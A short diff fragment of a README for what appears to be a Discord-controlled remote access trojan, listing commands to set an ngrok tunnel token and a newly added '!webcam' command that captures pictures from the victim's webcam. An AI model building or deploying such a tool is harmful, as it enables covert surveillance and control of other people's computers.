1ypi/Discord-Bot-RAT/README.md

 !key <your_ngrok_auth_token> - Set your ngrok auth token (get from ngrok.com, easy and free)

+!webcam - Sends a picture from the webcam

 ## 🛠 Discord Bot Setup Guide